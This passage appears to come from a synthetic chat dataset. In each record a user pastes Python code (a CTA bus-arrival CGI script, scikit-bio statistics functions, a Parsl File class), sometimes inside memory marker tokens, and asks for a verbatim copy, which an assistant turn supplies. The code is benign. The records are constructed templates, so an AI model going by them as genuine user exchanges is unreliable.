isinstance(out['bustime-response']['prd'], list):\n for x in range(0,len(out['bustime-response']['prd'])):\n if out['bustime-response']['prd'][x]:\n hourNow=int(out['bustime-response']['prd'][x]['tmstmp'][9:11])\n minNow=int(out['bustime-response']['prd'][x]['tmstmp'][12:14])\n hourPred=int(out['bustime-response']['prd'][x]['prdtm'][9:11])\n minPred=int(out['bustime-response']['prd'][x]['prdtm'][12:14])\n timeRemain = ((hourPred*60)+minPred) - ((hourNow*60)+minNow)\n for response in showResponse:\n print response + \"[\" + str(x) + \"]\" + \": \" + out['bustime-response']['prd'][x][response]\n print \"Minutes remaining: \" + str(timeRemain)\n print \"___\"\n else:\n if \"tmstmp\" in out['bustime-response']['prd']:\n # print out['bustime-response']['prd']['tmstmp'][9:11]\n # print out['bustime-response']['prd']['tmstmp'][12:14]\n # print out['bustime-response']['prd']['prdtm'][9:11] \n # print out['bustime-response']['prd']['prdtm'][12:14]\n hourNow=int(out['bustime-response']['prd']['tmstmp'][9:11])\n minNow=int(out['bustime-response']['prd']['tmstmp'][12:14])\n hourPred=int(out['bustime-response']['prd']['prdtm'][9:11])\n minPred=int(out['bustime-response']['prd']['prdtm'][12:14])\n timeRemain = ((hourPred*60)+minPred) - ((hourNow*60)+minNow)\n print \"Minutes remaining: \" + str(timeRemain)\n print \"___\"\n\nif int(strftime(\"%H\", gmtime())) > 18 or int(strftime(\"%H\", gmtime())) < 6 :\n # Heading home\n heading = \"home\"\n stops = [\"&rt=78&stpid=11401\", \"&rt=56&stpid=14101\"]\nelse:\n # heading to work\n heading = \"work\"\n stops = [\"&rt=78&stpid=11321\", \"&rt=56&stpid=5586\"]\n\n#print \"Content-Type: text/plain;charset=utf-8\"\nprint\nprint \"<html><title>Bus times - Heading to \" + heading + \"</title><body>\"\nprint \"<pre>\"\nprint \"hour: \" + str(int(strftime(\"%H\", gmtime())))\n\nfor stop in stops:\n fullurl = URL + apicmd + APIKEY + stop\n getPred(fullurl)\n\nprint \"</pre>\"\nprint \"\"\"\n<FORM>\n<INPUT TYPE=\"button\" onClick=\"history.go(0)\" VALUE=\"Refresh\">\n</FORM>\n\"\"\"\n```\nOutput it word-for-word.",
"role": "user"
}
] |
[
{
"content": "Here is some code:\n<|memory_start|>```python\n#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# CTA API CLI YAH\n\nimport sys\nimport requests\n#from bs4 import BeautifulSoup\nfrom xmltodict import parse\nimport datetime\nfrom time import gmtime, strftime\n# enable debugging\nimport cgitb\ncgitb.enable()\n\n# get API key from file\nf = open('./.cta-api.key', 'r')\nAPIKEY = \"?key=\" + f.read(25)\nf.close()\n\nURL=\"http://www.ctabustracker.com/bustime/api/v1/\"\napicmd = \"getpredictions\"\n\nshowResponse = [\"stpnm\",\"stpid\",\"vid\",\"rt\",\"rtdir\",\"prdtm\"]\n\ndef getPred(localurl):\n r = requests.get(localurl)\n out = parse(r.text)\n if \"error\" in out['bustime-response']:\n #print \"+\" + str(out) + \"+\"\n #print \"localurl: \" + str(localurl)\n print \"xXxXxXx\\nERROR: \" + out['bustime-response']['error']['msg']\n print \"xXxXxXx\\n\"\n #sys.exit(1)\n return\n print \"___\"\n # Lame safety check:\n if \"prdtm\" in out['bustime-response']['prd']:\n #print \"tmpstmp: \" + out['bustime-response']['prd']['tmstmp']\n for x in showResponse:\n print x + \": \" + out['bustime-response']['prd'][x] \n #out['bustime-response']['prd']:\n #print key\n #print x\n \n # true == multiple predictions returned\n if isinstance(out['bustime-response']['prd'], list):\n for x in range(0,len(out['bustime-response']['prd'])):\n if out['bustime-response']['prd'][x]:\n hourNow=int(out['bustime-response']['prd'][x]['tmstmp'][9:11])\n minNow=int(out['bustime-response']['prd'][x]['tmstmp'][12:14])\n hourPred=int(out['bustime-response']['prd'][x]['prdtm'][9:11])\n minPred=int(out['bustime-response']['prd'][x]['prdtm'][12:14])\n timeRemain = ((hourPred*60)+minPred) - ((hourNow*60)+minNow)\n for response in showResponse:\n print response + \"[\" + str(x) + \"]\" + \": \" + out['bustime-response']['prd'][x][response]\n print \"Minutes remaining: \" + str(timeRemain)\n print \"___\"\n else:\n if \"tmstmp\" in out['bustime-response']['prd']:\n # print out['bustime-response']['prd']['tmstmp'][9:11]\n # print out['bustime-response']['prd']['tmstmp'][12:14]\n # print out['bustime-response']['prd']['prdtm'][9:11] \n # print out['bustime-response']['prd']['prdtm'][12:14]\n hourNow=int(out['bustime-response']['prd']['tmstmp'][9:11])\n minNow=int(out['bustime-response']['prd']['tmstmp'][12:14])\n hourPred=int(out['bustime-response']['prd']['prdtm'][9:11])\n minPred=int(out['bustime-response']['prd']['prdtm'][12:14])\n timeRemain = ((hourPred*60)+minPred) - ((hourNow*60)+minNow)\n print \"Minutes remaining: \" + str(timeRemain)\n print \"___\"\n\nif int(strftime(\"%H\", gmtime())) > 18 or int(strftime(\"%H\", gmtime())) < 6 :\n # Heading home\n heading = \"home\"\n stops = [\"&rt=78&stpid=11401\", \"&rt=56&stpid=14101\"]\nelse:\n # heading to work\n heading = \"work\"\n stops = [\"&rt=78&stpid=11321\", \"&rt=56&stpid=5586\"]\n\n#print \"Content-Type: text/plain;charset=utf-8\"\nprint\nprint \"<html><title>Bus times - Heading to \" + heading + \"</title><body>\"\nprint \"<pre>\"\nprint \"hour: \" + str(int(strftime(\"%H\", gmtime())))\n\nfor stop in stops:\n fullurl = URL + apicmd + APIKEY + stop\n getPred(fullurl)\n\nprint \"</pre>\"\nprint \"\"\"\n<FORM>\n<INPUT TYPE=\"button\" onClick=\"history.go(0)\" VALUE=\"Refresh\">\n</FORM>\n\"\"\"\n```<|memory_end|>\nOutput it word-for-word.",
"role": "user"
}
] |
```python
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# CTA API CLI YAH
import sys
import requests
#from bs4 import BeautifulSoup
from xmltodict import parse
import datetime
from time import gmtime, strftime
# enable debugging
import cgitb
cgitb.enable()
# get API key from file
f = open('./.cta-api.key', 'r')
APIKEY = "?key=" + f.read(25)
f.close()
URL="http://www.ctabustracker.com/bustime/api/v1/"
apicmd = "getpredictions"
showResponse = ["stpnm","stpid","vid","rt","rtdir","prdtm"]
def getPred(localurl):
r = requests.get(localurl)
out = parse(r.text)
if "error" in out['bustime-response']:
#print "+" + str(out) + "+"
#print "localurl: " + str(localurl)
print "xXxXxXx\nERROR: " + out['bustime-response']['error']['msg']
print "xXxXxXx\n"
#sys.exit(1)
return
print "___"
# Lame safety check:
if "prdtm" in out['bustime-response']['prd']:
#print "tmpstmp: " + out['bustime-response']['prd']['tmstmp']
for x in showResponse:
print x + ": " + out['bustime-response']['prd'][x]
#out['bustime-response']['prd']:
#print key
#print x
# true == multiple predictions returned
if isinstance(out['bustime-response']['prd'], list):
for x in range(0,len(out['bustime-response']['prd'])):
if out['bustime-response']['prd'][x]:
hourNow=int(out['bustime-response']['prd'][x]['tmstmp'][9:11])
minNow=int(out['bustime-response']['prd'][x]['tmstmp'][12:14])
hourPred=int(out['bustime-response']['prd'][x]['prdtm'][9:11])
minPred=int(out['bustime-response']['prd'][x]['prdtm'][12:14])
timeRemain = ((hourPred*60)+minPred) - ((hourNow*60)+minNow)
for response in showResponse:
print response + "[" + str(x) + "]" + ": " + out['bustime-response']['prd'][x][response]
print "Minutes remaining: " + str(timeRemain)
print "___"
else:
if "tmstmp" in out['bustime-response']['prd']:
# print out['bustime-response']['prd']['tmstmp'][9:11]
# print out['bustime-response']['prd']['tmstmp'][12:14]
# print out['bustime-response']['prd']['prdtm'][9:11]
# print out['bustime-response']['prd']['prdtm'][12:14]
hourNow=int(out['bustime-response']['prd']['tmstmp'][9:11])
minNow=int(out['bustime-response']['prd']['tmstmp'][12:14])
hourPred=int(out['bustime-response']['prd']['prdtm'][9:11])
minPred=int(out['bustime-response']['prd']['prdtm'][12:14])
timeRemain = ((hourPred*60)+minPred) - ((hourNow*60)+minNow)
print "Minutes remaining: " + str(timeRemain)
print "___"
if int(strftime("%H", gmtime())) > 18 or int(strftime("%H", gmtime())) < 6 :
# Heading home
heading = "home"
stops = ["&rt=78&stpid=11401", "&rt=56&stpid=14101"]
else:
# heading to work
heading = "work"
stops = ["&rt=78&stpid=11321", "&rt=56&stpid=5586"]
#print "Content-Type: text/plain;charset=utf-8"
print
print "<html><title>Bus times - Heading to " + heading + "</title><body>"
print "<pre>"
print "hour: " + str(int(strftime("%H", gmtime())))
for stop in stops:
fullurl = URL + apicmd + APIKEY + stop
getPred(fullurl)
print "</pre>"
print """
<FORM>
<INPUT TYPE="button" onClick="history.go(0)" VALUE="Refresh">
</FORM>
"""
```
|
[
{
"content": "```python\n#!/usr/bin/env python\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2013--, scikit-bio development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\n\"\"\"Translations of functions from Release 2.3 of the Cephes Math Library,\nwhich is (c) Stephen L. Moshier 1984, 1995.\n\"\"\"\nfrom __future__ import division\n\nfrom math import atan, sqrt\n\nfrom skbio.maths.stats.special import (fix_rounding_error, expm1, log1p, betai,\n igamc, erf, erfc, GB, SQRTH, LP, LQ, EQ,\n MACHEP, PI)\n\n\ndef chi_high(x, df):\n \"\"\"Returns right-hand tail of chi-square distribution (x to infinity).\n\n df, the degrees of freedom, ranges from 1 to infinity (assume integers).\n Typically, df is (r-1)*(c-1) for a r by c table.\n\n Result ranges from 0 to 1.\n\n See Cephes docs for details.\n \"\"\"\n x = fix_rounding_error(x)\n\n if x < 0:\n raise ValueError(\"chi_high: x must be >= 0 (got %s).\" % x)\n if df < 1:\n raise ValueError(\"chi_high: df must be >= 1 (got %s).\" % df)\n return igamc(df / 2, x / 2)\n\n\ndef z_high(x):\n \"\"\"Returns right-hand tail of z distribution (0 to x).\n\n x ranges from -infinity to +infinity; result ranges from 0 to 1\n\n See Cephes docs for details.\"\"\"\n y = x * SQRTH\n z = abs(y)\n if z < SQRTH:\n return 0.5 - 0.5 * erf(y)\n else:\n if x < 0:\n return 1 - 0.5 * erfc(z)\n else:\n return 0.5 * erfc(z)\n\n\ndef zprob(x):\n \"\"\"Returns both tails of z distribution (-inf to -x, inf to x).\"\"\"\n return 2 * z_high(abs(x))\n\n\ndef t_low(t, df):\n \"\"\"Returns left-hand tail of Student's t distribution (-infinity to x).\n\n df, the degrees of freedom, ranges from 1 to infinity.\n Typically, df is (n-1) for a sample size of n.\n\n Result ranges from 0 to 1.\n\n See Cephes docs for details.\n \"\"\"\n if df < 1:\n raise ValueError(\"t_low: df must be >= 1 (got %s).\" % df)\n return stdtr(df, t)\n\n\ndef t_high(t, df):\n \"\"\"Returns right-hand tail of Student's t distribution (x to infinity).\n\n df, the degrees of freedom, ranges from 1 to infinity.\n Typically, df is (n-1) for a sample size of n.\n\n Result ranges from 0 to 1.\n\n See Cephes docs for details.\n \"\"\"\n if df < 1:\n raise ValueError(\"t_high: df must be >= 1 (got %s).\" % df)\n return stdtr(df, -t) # distribution is symmetric\n\n\ndef tprob(t, df):\n \"\"\"Returns both tails of t distribution (-infinity to -x, infinity to x)\"\"\"\n return 2 * t_high(abs(t), df)\n\n\ndef f_high(df1, df2, x):\n \"\"\"Returns right-hand tail of f distribution (x to infinity).\n\n Result ranges from 0 to 1.\n\n See Cephes docs for details.\n \"\"\"\n return fdtrc(df1, df2, x)\n\n\ndef fdtrc(a, b, x):\n \"\"\"Returns right tail of F distribution, x to infinity.\n\n See Cephes docs for details.\n \"\"\"\n if min(a, b) < 1:\n raise ValueError(\"F a and b (degrees of freedom) must both be >= 1.\")\n if x < 0:\n raise ValueError(\"F distribution value of f must be >= 0.\")\n w = float(b) / (b + a * x)\n return betai(0.5 * b, 0.5 * a, w)\n\n\ndef binomial_high(successes, trials, prob):\n \"\"\"Returns right-hand binomial tail (X > successes) given prob(success).\"\"\"\n if -1 <= successes < 0:\n return 1\n return bdtrc(successes, trials, prob)\n\n\ndef bdtrc(k, n, p):\n \"\"\"Complement of binomial distribution, k+1 through n.\n\n Uses formula bdtrc(k, n, p) = betai(k+1, n-k, p)\n\n See Cephes docs for details.\n \"\"\"\n p = fix_rounding_error(p)\n if (p < 0) or (p > 1):\n raise ValueError(\"Binomial p must be between 0 and 1.\")\n if (k < 0) or (n < k):\n raise ValueError(\"Binomial k must be between 0 and n.\")\n if k == n:\n return 0\n dn = n - k\n if k == 0:\n if p < .01:\n dk = -expm1(dn * log1p(-p))\n else:\n dk = 1 - pow(1.0 - p, dn)\n else:\n dk = k + 1\n dk = betai(dk, dn, p)\n return dk\n\n\ndef stdtr(k, t):\n \"\"\"Student's t distribution, -infinity to t.\n\n See Cephes docs for details.\n \"\"\"\n if k <= 0:\n raise ValueError('stdtr: df must be > 0.')\n if t == 0:\n return 0.5\n if t < -2:\n rk = k\n z = rk / (rk + t * t)\n return 0.5 * betai(0.5 * rk, 0.5, z)\n # compute integral from -t to + t\n if t < 0:\n x = -t\n else:\n x = t\n\n rk = k # degrees of freedom\n z = 1 + (x * x) / rk\n # test if k is odd or even\n if (k & 1) != 0:\n # odd k\n xsqk = x / sqrt(rk)\n p = atan(xsqk)\n if k > 1:\n f = 1\n tz = 1\n j = 3\n while (j <= (k - 2)) and ((tz / f) > MACHEP):\n tz *= (j - 1) / (z * j)\n f += tz\n j += 2\n p += f * xsqk / z\n p *= 2 / PI\n else:\n # even k\n f = 1\n tz = 1\n j = 2\n while (j <= (k - 2)) and ((tz / f) > MACHEP):\n tz *= (j - 1) / (z * j)\n f += tz\n j += 2\n p = f * x / sqrt(z * rk)\n # common exit\n if t < 0:\n p = -p # note destruction of relative accuracy\n p = 0.5 + 0.5 * p\n return p\n\n\ndef pseries(a, b, x):\n \"\"\"Power series for incomplete beta integral.\n\n Use when b * x is small and x not too close to 1.\n\n See Cephes docs for details.\n \"\"\"\n ai = 1 / a\n u = (1 - b) * x\n v = u / (a + 1)\n t1 = v\n t = u\n n = 2\n s = 0\n z = MACHEP * ai\n while abs(v) > z:\n u = (n - b) * x / n\n t *= u\n v = t / (a + n)\n s += v\n n += 1\n s += t1\n s += ai\n\n u = a * log(x)\n if ((a + b) < MAXGAM) and (abs(u) < MAXLOG):\n t = Gamma(a + b) / (Gamma(a) * Gamma(b))\n s = s * t * pow(x, a)\n else:\n t = lgam(a + b) - lgam(a) - lgam(b) + u + log(s)\n if t < MINLOG:\n s = 0\n else:\n s = exp(t)\n return(s)\n```\nProvide the complete code exactly.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n#!/usr/bin/env python\n\n# ----------------------------------------------------------------------------\n# Copyright (c) 2013--, scikit-bio development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\n\"\"\"Translations of functions from Release 2.3 of the Cephes Math Library,\nwhich is (c) Stephen L. Moshier 1984, 1995.\n\"\"\"\nfrom __future__ import division\n\nfrom math import atan, sqrt\n\nfrom skbio.maths.stats.special import (fix_rounding_error, expm1, log1p, betai,\n igamc, erf, erfc, GB, SQRTH, LP, LQ, EQ,\n MACHEP, PI)\n\n\ndef chi_high(x, df):\n \"\"\"Returns right-hand tail of chi-square distribution (x to infinity).\n\n df, the degrees of freedom, ranges from 1 to infinity (assume integers).\n Typically, df is (r-1)*(c-1) for a r by c table.\n\n Result ranges from 0 to 1.\n\n See Cephes docs for details.\n \"\"\"\n x = fix_rounding_error(x)\n\n if x < 0:\n raise ValueError(\"chi_high: x must be >= 0 (got %s).\" % x)\n if df < 1:\n raise ValueError(\"chi_high: df must be >= 1 (got %s).\" % df)\n return igamc(df / 2, x / 2)\n\n\ndef z_high(x):\n \"\"\"Returns right-hand tail of z distribution (0 to x).\n\n x ranges from -infinity to +infinity; result ranges from 0 to 1\n\n See Cephes docs for details.\"\"\"\n y = x * SQRTH\n z = abs(y)\n if z < SQRTH:\n return 0.5 - 0.5 * erf(y)\n else:\n if x < 0:\n return 1 - 0.5 * erfc(z)\n else:\n return 0.5 * erfc(z)\n\n\ndef zprob(x):\n \"\"\"Returns both tails of z distribution (-inf to -x, inf to x).\"\"\"\n return 2 * z_high(abs(x))\n\n\ndef t_low(t, df):\n \"\"\"Returns left-hand tail of Student's t distribution (-infinity to x).\n\n df, the degrees of freedom, ranges from 1 to infinity.\n Typically, df is (n-1) for a sample size of n.\n\n Result ranges from 0 to 1.\n\n See Cephes docs for details.\n \"\"\"\n if df < 1:\n raise ValueError(\"t_low: df must be >= 1 (got %s).\" % df)\n return stdtr(df, t)\n\n\ndef t_high(t, df):\n \"\"\"Returns right-hand tail of Student's t distribution (x to infinity).\n\n df, the degrees of freedom, ranges from 1 to infinity.\n Typically, df is (n-1) for a sample size of n.\n\n Result ranges from 0 to 1.\n\n See Cephes docs for details.\n \"\"\"\n if df < 1:\n raise ValueError(\"t_high: df must be >= 1 (got %s).\" % df)\n return stdtr(df, -t) # distribution is symmetric\n\n\ndef tprob(t, df):\n \"\"\"Returns both tails of t distribution (-infinity to -x, infinity to x)\"\"\"\n return 2 * t_high(abs(t), df)\n\n\ndef f_high(df1, df2, x):\n \"\"\"Returns right-hand tail of f distribution (x to infinity).\n\n Result ranges from 0 to 1.\n\n See Cephes docs for details.\n \"\"\"\n return fdtrc(df1, df2, x)\n\n\ndef fdtrc(a, b, x):\n \"\"\"Returns right tail of F distribution, x to infinity.\n\n See Cephes docs for details.\n \"\"\"\n if min(a, b) < 1:\n raise ValueError(\"F a and b (degrees of freedom) must both be >= 1.\")\n if x < 0:\n raise ValueError(\"F distribution value of f must be >= 0.\")\n w = float(b) / (b + a * x)\n return betai(0.5 * b, 0.5 * a, w)\n\n\ndef binomial_high(successes, trials, prob):\n \"\"\"Returns right-hand binomial tail (X > successes) given prob(success).\"\"\"\n if -1 <= successes < 0:\n return 1\n return bdtrc(successes, trials, prob)\n\n\ndef bdtrc(k, n, p):\n \"\"\"Complement of binomial distribution, k+1 through n.\n\n Uses formula bdtrc(k, n, p) = betai(k+1, n-k, p)\n\n See Cephes docs for details.\n \"\"\"\n p = fix_rounding_error(p)\n if (p < 0) or (p > 1):\n raise ValueError(\"Binomial p must be between 0 and 1.\")\n if (k < 0) or (n < k):\n raise ValueError(\"Binomial k must be between 0 and n.\")\n if k == n:\n return 0\n dn = n - k\n if k == 0:\n if p < .01:\n dk = -expm1(dn * log1p(-p))\n else:\n dk = 1 - pow(1.0 - p, dn)\n else:\n dk = k + 1\n dk = betai(dk, dn, p)\n return dk\n\n\ndef stdtr(k, t):\n \"\"\"Student's t distribution, -infinity to t.\n\n See Cephes docs for details.\n \"\"\"\n if k <= 0:\n raise ValueError('stdtr: df must be > 0.')\n if t == 0:\n return 0.5\n if t < -2:\n rk = k\n z = rk / (rk + t * t)\n return 0.5 * betai(0.5 * rk, 0.5, z)\n # compute integral from -t to + t\n if t < 0:\n x = -t\n else:\n x = t\n\n rk = k # degrees of freedom\n z = 1 + (x * x) / rk\n # test if k is odd or even\n if (k & 1) != 0:\n # odd k\n xsqk = x / sqrt(rk)\n p = atan(xsqk)\n if k > 1:\n f = 1\n tz = 1\n j = 3\n while (j <= (k - 2)) and ((tz / f) > MACHEP):\n tz *= (j - 1) / (z * j)\n f += tz\n j += 2\n p += f * xsqk / z\n p *= 2 / PI\n else:\n # even k\n f = 1\n tz = 1\n j = 2\n while (j <= (k - 2)) and ((tz / f) > MACHEP):\n tz *= (j - 1) / (z * j)\n f += tz\n j += 2\n p = f * x / sqrt(z * rk)\n # common exit\n if t < 0:\n p = -p # note destruction of relative accuracy\n p = 0.5 + 0.5 * p\n return p\n\n\ndef pseries(a, b, x):\n \"\"\"Power series for incomplete beta integral.\n\n Use when b * x is small and x not too close to 1.\n\n See Cephes docs for details.\n \"\"\"\n ai = 1 / a\n u = (1 - b) * x\n v = u / (a + 1)\n t1 = v\n t = u\n n = 2\n s = 0\n z = MACHEP * ai\n while abs(v) > z:\n u = (n - b) * x / n\n t *= u\n v = t / (a + n)\n s += v\n n += 1\n s += t1\n s += ai\n\n u = a * log(x)\n if ((a + b) < MAXGAM) and (abs(u) < MAXLOG):\n t = Gamma(a + b) / (Gamma(a) * Gamma(b))\n s = s * t * pow(x, a)\n else:\n t = lgam(a + b) - lgam(a) - lgam(b) + u + log(s)\n if t < MINLOG:\n s = 0\n else:\n s = exp(t)\n return(s)\n```<|memory_end|>\nProvide the complete code exactly.",
"role": "user"
}
] |
```python
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
"""Translations of functions from Release 2.3 of the Cephes Math Library,
which is (c) Stephen L. Moshier 1984, 1995.
"""
from __future__ import division
from math import atan, sqrt
from skbio.maths.stats.special import (fix_rounding_error, expm1, log1p, betai,
igamc, erf, erfc, GB, SQRTH, LP, LQ, EQ,
MACHEP, PI)
def chi_high(x, df):
"""Returns right-hand tail of chi-square distribution (x to infinity).
df, the degrees of freedom, ranges from 1 to infinity (assume integers).
Typically, df is (r-1)*(c-1) for a r by c table.
Result ranges from 0 to 1.
See Cephes docs for details.
"""
x = fix_rounding_error(x)
if x < 0:
raise ValueError("chi_high: x must be >= 0 (got %s)." % x)
if df < 1:
raise ValueError("chi_high: df must be >= 1 (got %s)." % df)
return igamc(df / 2, x / 2)
def z_high(x):
"""Returns right-hand tail of z distribution (0 to x).
x ranges from -infinity to +infinity; result ranges from 0 to 1
See Cephes docs for details."""
y = x * SQRTH
z = abs(y)
if z < SQRTH:
return 0.5 - 0.5 * erf(y)
else:
if x < 0:
return 1 - 0.5 * erfc(z)
else:
return 0.5 * erfc(z)
def zprob(x):
"""Returns both tails of z distribution (-inf to -x, inf to x)."""
return 2 * z_high(abs(x))
def t_low(t, df):
"""Returns left-hand tail of Student's t distribution (-infinity to x).
df, the degrees of freedom, ranges from 1 to infinity.
Typically, df is (n-1) for a sample size of n.
Result ranges from 0 to 1.
See Cephes docs for details.
"""
if df < 1:
raise ValueError("t_low: df must be >= 1 (got %s)." % df)
return stdtr(df, t)
def t_high(t, df):
"""Returns right-hand tail of Student's t distribution (x to infinity).
df, the degrees of freedom, ranges from 1 to infinity.
Typically, df is (n-1) for a sample size of n.
Result ranges from 0 to 1.
See Cephes docs for details.
"""
if df < 1:
raise ValueError("t_high: df must be >= 1 (got %s)." % df)
return stdtr(df, -t) # distribution is symmetric
def tprob(t, df):
"""Returns both tails of t distribution (-infinity to -x, infinity to x)"""
return 2 * t_high(abs(t), df)
def f_high(df1, df2, x):
"""Returns right-hand tail of f distribution (x to infinity).
Result ranges from 0 to 1.
See Cephes docs for details.
"""
return fdtrc(df1, df2, x)
def fdtrc(a, b, x):
"""Returns right tail of F distribution, x to infinity.
See Cephes docs for details.
"""
if min(a, b) < 1:
raise ValueError("F a and b (degrees of freedom) must both be >= 1.")
if x < 0:
raise ValueError("F distribution value of f must be >= 0.")
w = float(b) / (b + a * x)
return betai(0.5 * b, 0.5 * a, w)
def binomial_high(successes, trials, prob):
"""Returns right-hand binomial tail (X > successes) given prob(success)."""
if -1 <= successes < 0:
return 1
return bdtrc(successes, trials, prob)
def bdtrc(k, n, p):
"""Complement of binomial distribution, k+1 through n.
Uses formula bdtrc(k, n, p) = betai(k+1, n-k, p)
See Cephes docs for details.
"""
p = fix_rounding_error(p)
if (p < 0) or (p > 1):
raise ValueError("Binomial p must be between 0 and 1.")
if (k < 0) or (n < k):
raise ValueError("Binomial k must be between 0 and n.")
if k == n:
return 0
dn = n - k
if k == 0:
if p < .01:
dk = -expm1(dn * log1p(-p))
else:
dk = 1 - pow(1.0 - p, dn)
else:
dk = k + 1
dk = betai(dk, dn, p)
return dk
def stdtr(k, t):
"""Student's t distribution, -infinity to t.
See Cephes docs for details.
"""
if k <= 0:
raise ValueError('stdtr: df must be > 0.')
if t == 0:
return 0.5
if t < -2:
rk = k
z = rk / (rk + t * t)
return 0.5 * betai(0.5 * rk, 0.5, z)
# compute integral from -t to + t
if t < 0:
x = -t
else:
x = t
rk = k # degrees of freedom
z = 1 + (x * x) / rk
# test if k is odd or even
if (k & 1) != 0:
# odd k
xsqk = x / sqrt(rk)
p = atan(xsqk)
if k > 1:
f = 1
tz = 1
j = 3
while (j <= (k - 2)) and ((tz / f) > MACHEP):
tz *= (j - 1) / (z * j)
f += tz
j += 2
p += f * xsqk / z
p *= 2 / PI
else:
# even k
f = 1
tz = 1
j = 2
while (j <= (k - 2)) and ((tz / f) > MACHEP):
tz *= (j - 1) / (z * j)
f += tz
j += 2
p = f * x / sqrt(z * rk)
# common exit
if t < 0:
p = -p # note destruction of relative accuracy
p = 0.5 + 0.5 * p
return p
def pseries(a, b, x):
"""Power series for incomplete beta integral.
Use when b * x is small and x not too close to 1.
See Cephes docs for details.
"""
ai = 1 / a
u = (1 - b) * x
v = u / (a + 1)
t1 = v
t = u
n = 2
s = 0
z = MACHEP * ai
while abs(v) > z:
u = (n - b) * x / n
t *= u
v = t / (a + n)
s += v
n += 1
s += t1
s += ai
u = a * log(x)
if ((a + b) < MAXGAM) and (abs(u) < MAXLOG):
t = Gamma(a + b) / (Gamma(a) * Gamma(b))
s = s * t * pow(x, a)
else:
t = lgam(a + b) - lgam(a) - lgam(b) + u + log(s)
if t < MINLOG:
s = 0
else:
s = exp(t)
return(s)
```
|
[
{
"content": "Write the code verbatim:\n```python\n\"\"\"Define the File Type.\n\nThe primary purpose of the File object is to track the protocol to be used\nto transfer the file as well as to give the appropriate filepath depending\non where (client-side, remote-side, intermediary-side) the File.filepath is\nbeing called from.\n\"\"\"\n\nimport os\nimport logging\nfrom urllib.parse import urlparse\nfrom parsl.data_provider.data_manager import DataManager\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass File(str):\n \"\"\"The Parsl File Class.\n\n This class captures various attributes of a file, and relies on client-side and\n worker-side systems to enable to appropriate transfer of files.\n\n Note that an error will be raised if one tries to create a File without an\n associated DataManager. That DataManager may be specified explicitly\n as a parameter to the File constructor, or may be implicitly specified via\n a previously loaded Parsl config.\n\n A File which is not associated with a DataManager is ill-defined.\n\n \"\"\"\n\n def __init__(self, url, dman=None, cache=False, caching_dir=\".\"):\n \"\"\"Construct a File object from a url string.\n\n Args:\n - url (string) : url string of the file e.g.\n - 'input.txt'\n - 'file:///scratch/proj101/input.txt'\n - 'globus://go#ep1/~/data/input.txt'\n - 'globus://ddb59aef-6d04-11e5-ba46-22000b92c6ec/home/johndoe/data/input.txt'\n - dman (DataManager) : data manager\n \"\"\"\n self.url = url\n parsed_url = urlparse(self.url)\n self.scheme = parsed_url.scheme if parsed_url.scheme else 'file'\n self.netloc = parsed_url.netloc\n self.path = parsed_url.path\n self.filename = os.path.basename(self.path)\n self.dman = dman if dman else DataManager.get_data_manager()\n self.data_future = {}\n if self.scheme == 'globus':\n self.dman.add_file(self)\n\n self.cache = cache\n self.caching_dir = caching_dir\n\n def __str__(self):\n return self.filepath\n\n def __repr__(self):\n return self.__str__()\n\n def __fspath__(self):\n return self.filepath\n\n def is_remote(self):\n if self.scheme in ['ftp', 'http', 'https', 'globus']:\n return True\n elif self.scheme in ['file']: # TODO: is this enough?\n return False\n else:\n raise Exception('Cannot determine if unknown file scheme {} is remote'.format(self.scheme))\n\n @property\n def filepath(self):\n \"\"\"Return the resolved filepath on the side where it is called from.\n\n The appropriate filepath will be returned when called from within\n an app running remotely as well as regular python on the client side.\n\n Args:\n - self\n Returns:\n - filepath (string)\n \"\"\"\n if self.scheme in ['ftp', 'http', 'https', 'globus']:\n # The path returned here has to match exactly with where the\n if hasattr(self, 'local_path'):\n return self.local_path\n else:\n return self.filename\n elif self.scheme in ['file']:\n return self.path\n else:\n raise Exception('Cannot return filepath for unknown scheme {}'.format(self.scheme))\n\n def stage_in(self, executor):\n \"\"\"Transport file from the input source to the executor.\n\n Args:\n - executor (str) - executor the file is staged in to.\n\n \"\"\"\n\n return self.dman.stage_in(self, executor)\n\n def stage_out(self, executor=None):\n \"\"\"Transport file from executor to final output destination.\"\"\"\n return self.dman.stage_out(self, executor)\n\n def set_data_future(self, df, executor=None):\n self.data_future[executor] = df\n\n def get_data_future(self, executor):\n return self.data_future.get(executor)\n\n def __getstate__(self):\n \"\"\"Override the default pickling method.\n\n The File object gets pickled and transmitted to remote executors during app\n execution. This enables pickling while retaining the lockable resources\n to the DFK/Client side.\n \"\"\"\n\n state = self.__dict__.copy()\n\n # We have already made a copy of the future objects, they are now no longer\n # reliable as means to wait for the staging events\n for executor in state[\"data_future\"]:\n # This is assumed to be safe, since the data_future represents staging to a specific executor\n # and an executor will only have one filepath.\n state[\"data_future\"][executor] = state[\"data_future\"][executor].filepath\n\n state[\"dman\"] = None\n\n return state\n\n def __setstate__(self, state):\n \"\"\" Overloading the default pickle method to reconstruct a File from serialized form\n\n This might require knowledge of whether a DataManager is already present in the context.\n \"\"\"\n self.__dict__.update(state)\n\n\nif __name__ == '__main__':\n\n x = File('./files.py')\n```\nDo not add anything else.",
"role": "user"
}
] |
[
{
